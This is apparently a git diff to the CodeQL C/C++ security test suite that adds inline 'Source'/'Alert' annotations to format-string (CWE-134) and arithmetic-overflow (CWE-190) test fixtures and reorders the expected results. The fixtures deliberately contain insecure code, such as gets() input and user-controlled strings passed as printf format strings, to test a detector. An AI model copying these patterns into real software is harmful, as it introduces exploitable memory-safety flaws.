utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp index 7242bedc133e..b3815dfd0b7c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/consts.cpp @@ -82,65 +82,65 @@ void a() { // BAD: v1 value came from the user char v1[100]; - gets(v1); - printf(v1); + gets(v1); // $ Source + printf(v1); // $ Alert // BAD: v2 value came from the user char *v2; - v2 = gets(v1); - printf(v2); + v2 = gets(v1); // $ Source + printf(v2); // $ Alert // BAD: v3 value is copied from v1, which came from the user char *v3 = v1; - printf(v3); + printf(v3); // $ Alert // BAD: v4 value is copied from v1, which came from the user char *v4; v4 = v1; - printf(v4); + printf(v4); // $ Alert // BAD: varFunc() is not defined, so it may not be constant - printf(varFunc()); + printf(varFunc()); // $ Alert // BAD: varFunc() is not defined, so it may not be constant - char *v5 = varFunc(); - printf(v5); + char *v5 = varFunc(); // $ Source + printf(v5); // $ Alert // BAD: varFunc() is not defined, so it may not be constant char *v6; - v6 = varFunc(); - printf(v6); + v6 = varFunc(); // $ Source + printf(v6); // $ Alert // BAD: all elements of v7 came from the user char *v7[] = { v1, v2 }; - printf(v7[0]); + printf(v7[0]); // $ Alert // BAD: v8 started as constant, but changed to a value that came from the user char *v8 = "a"; v8 = v7[1]; - printf(v8); + printf(v8); // $ Alert gv1[1] = v1; // BAD: nonConstFuncToArray() always returns a value from gv1, which is started as constant but was changed to a value that came from the user - printf(nonConstFuncToArray(0)); + printf(nonConstFuncToArray(0)); // $ Alert // BAD: v9 value is copied from v1, which came from the user const char *v9 = v1; - printf(v9); + printf(v9); // $ Alert // BAD: v10 value is derived from values that are not constant char v10[10]; sprintf(v10, "%s", v1); - printf(v10); + printf(v10); // $ Alert // BAD: v11 is initialized via a pointer char *v11; - readString(&v11); - printf(v11); + readString(&v11); // $ Source + printf(v11); // $ Alert // BAD: v12 is initialized via a reference char *v12; - readStringRef(v12); - printf(v12); + readStringRef(v12); // $ Source + printf(v12); // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c index d2b28baac236..23a05e1ec50a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.c @@ -13,8 +13,8 @@ FILE *f; int main(int argc, char **argv) { // BAD: i1 comes from the user char i1[1024]; - fread(i1, sizeof(char), 1024, f); - printf(i1); + fread(i1, sizeof(char), 1024, f); // $ Source + printf(i1); // $ Alert // GOOD: i2 comes from the user, but is not the format string here char i2[1024]; @@ -23,39 +23,39 @@ int main(int argc, char **argv) { // BAD: i3 comes from the user char i3[1024]; - fgets(i3, 1, 0); - printf(i3); + fgets(i3, 1, 0); // $ Source + printf(i3); // $ Alert // BAD: i4 comes from the user char i41[1024]; - char *i4 = fgets(i41, 1, f); - printf(i4); + char *i4 = fgets(i41, 1, f); // $ Source + printf(i4); // $ Alert // BAD: i5 comes from the user char i5[1024]; - gets(i5); - printf(i5); + gets(i5); // $ Source + printf(i5); // $ Alert // BAD: i6 comes from the user char i61[1024]; - char *i6 = gets(i61); - printf(i6); + char *i6 = gets(i61); // $ Source + printf(i6); // $ Alert // BAD: i7 comes from the user char **i7; - gets(*i7); - printf(*i7); + gets(*i7); // $ Source + printf(*i7); // $ Alert // BAD: i8 comes from the user char i81[1024]; char **i8; - *i8 = gets(i81); - printf(*i8); + *i8 = gets(i81); // $ Source + printf(*i8); // $ Alert // BAD: e1 comes from i1, which comes from the user char e1[1]; e1[0] = i1[0]; - printf(e1); + printf(e1); // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected index 4447b215aedf..3966ccbf52fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected @@ -1,3 +1,12 @@ +#select +| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | +| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | +| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | +| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | +| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | +| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | +| funcsLocal.c:53:9:53:11 | ** ... | funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | +| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | edges | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | provenance | | | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:57:2:57:14 | ... = ... | provenance | | @@ -32,12 +41,3 @@ nodes | funcsLocal.c:57:2:57:14 | ... = ... | semmle.label | ... = ... | | funcsLocal.c:58:9:58:10 | *e1 | semmle.label | *e1 | subpaths -#select -| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | -| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | -| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | -| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | -| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | -| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | -| funcsLocal.c:53:9:53:11 | ** ... | funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | -| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected index 7408d8360ef5..8f06acca17f1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected @@ -1,3 +1,9 @@ +#select +| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | edges | globalVars.c:8:7:8:10 | **copy | globalVars.c:8:7:8:10 | **copy | provenance | | | globalVars.c:8:7:8:10 | **copy | globalVars.c:27:9:27:12 | *copy | provenance | | @@ -55,9 +61,3 @@ subpaths | globalVars.c:30:15:30:18 | *copy | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:30:15:30:18 | printWrapper output argument | | globalVars.c:35:11:35:14 | *copy | globalVars.c:15:21:15:23 | *val | globalVars.c:15:21:15:23 | *val | globalVars.c:35:11:35:14 | setCopy2 output argument | | globalVars.c:41:15:41:19 | *copy2 | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:41:15:41:19 | printWrapper output argument | -#select -| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c index c36c708eab04..dedeade890aa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/globalVars.c @@ -20,14 +20,14 @@ void printWrapper(char *str) { printf(str); } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source copyArgv(argv); // BAD: format comes from argv through copy - printf(copy); + printf(copy); // $ Alert // BAD: format comes from argv through copy - printWrapper(copy); + printWrapper(copy); // $ Alert // GOOD: constant format printf("%s", copy); @@ -35,10 +35,10 @@ int main(int argc, char **argv) { setCopy2(copy); // BAD: format comes from argv through copy2 (that is set to copy that is set to argv[1]) - printf(copy2); + printf(copy2); // $ Alert // BAD: format comes from argv through copy2 (that is set to copy that is set to argv[1]) - printWrapper(copy2); + printWrapper(copy2); // $ Alert // GOOD: constant format printf("%s", copy2); @@ -47,5 +47,5 @@ int main(int argc, char **argv) { // Should be GOOD because copy2 has value "asdf" // But we flag this case because once a global variable gets tainted we mark all usages as tainted - printf(copy2); + printf(copy2); // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c index 3d15905d82d6..b7a8eca6e0f2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.c @@ -13,7 +13,7 @@ int inv(int a) { return !a; } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source int varZero = 0; int varOne = 1; @@ -59,69 +59,69 @@ int main(int argc, char **argv) { char *c7; if (globalZero) c7 = argv[1]; - printf(c7); + printf(c7); // $ Alert // GOOD: inv(1) returns 0 and it never goes inside the if // But we can't handle this case because currently we don't analyse arguments in function calls char *c8; if (inv(1)) c8 = argv[1]; - printf(c8); + printf(c8); // $ Alert // BAD: condition is true and it always goes inside the if char *i1; if (1) i1 = argv[1]; - printf(i1); + printf(i1); // $ Alert // BAD: condition is true and it always goes inside the if char *i2; if (0 == 0) i2 = argv[1]; - printf(i2); + printf(i2); // $ Alert // BAD: condition is true and it always goes inside the if char *i3; if (!0) i3 = argv[1]; - printf(i3); + printf(i3); // $ Alert // BAD: varOne is 1 so condition is true and it always goes inside the if char *i4; if (varOne) i4 = argv[1]; - printf(i4); + printf(i4); // $ Alert // BAD: varZero is 0 so condition is true and it always goes inside the if char *i5; if (!varZero) i5 = argv[1]; - printf(i5); + printf(i5); // $ Alert // BAD: condition is true and it always goes inside the if // But our analysis only handle booleans, so it isn't able the detect that both values are the same (we can handle only 0 == 0) char *i6; if (varOne == varOne) i6 = argv[1]; - printf(i6); + printf(i6); // $ Alert // BAD: globalOne is 1 so condition is true and it always goes inside the if char *i7; if (globalOne) i7 = argv[1]; - printf(i7); + printf(i7); // $ Alert // BAD: we don't know the value of globalUnknown so we have to assume it can be true char *i8; if (globalUnknown) i8 = argv[1]; - printf(i8); + printf(i8); // $ Alert // BAD: inv(0) returns 1 and it always goes inside the if char *i9; if (inv(0)) i9 = argv[1]; - printf(i9); + printf(i9); // $ Alert return 0; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected index e8d852cbcd27..5dad063c999f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected @@ -1,3 +1,15 @@ +#select +| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | edges | ifs.c:16:27:16:30 | **argv | ifs.c:61:3:61:14 | *... = ... | provenance | | | ifs.c:16:27:16:30 | **argv | ifs.c:68:3:68:14 | *... = ... | provenance | | @@ -46,15 +58,3 @@ nodes | ifs.c:123:3:123:14 | *... = ... | semmle.label | *... = ... | | ifs.c:124:9:124:10 | *i9 | semmle.label | *i9 | subpaths -#select -| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected index a2221ec2fd3f..b1a17aac3623 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected @@ -1,8 +1,8 @@ +#select +| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf | edges | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | provenance | | nodes | examples.cpp:63:26:63:30 | fscanf output argument | semmle.label | fscanf output argument | | examples.cpp:66:11:66:14 | data | semmle.label | data | subpaths -#select -| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref index 3939653db1c3..d8fb26f7e023 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticTainted.ql +query: Security/CWE/CWE-190/ArithmeticTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected index dbc1a99858e9..24e8043d7dbf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected @@ -1,3 +1,16 @@ +#select +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | edges | examples.cpp:22:5:22:33 | ... = ... | examples.cpp:25:31:25:34 | data | provenance | | | examples.cpp:22:26:22:33 | call to rand | examples.cpp:22:5:22:33 | ... = ... | provenance | | @@ -31,16 +44,3 @@ nodes | examples.cpp:35:26:35:33 | call to rand | semmle.label | call to rand | | examples.cpp:38:9:38:12 | data | semmle.label | data | subpaths -#select -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value 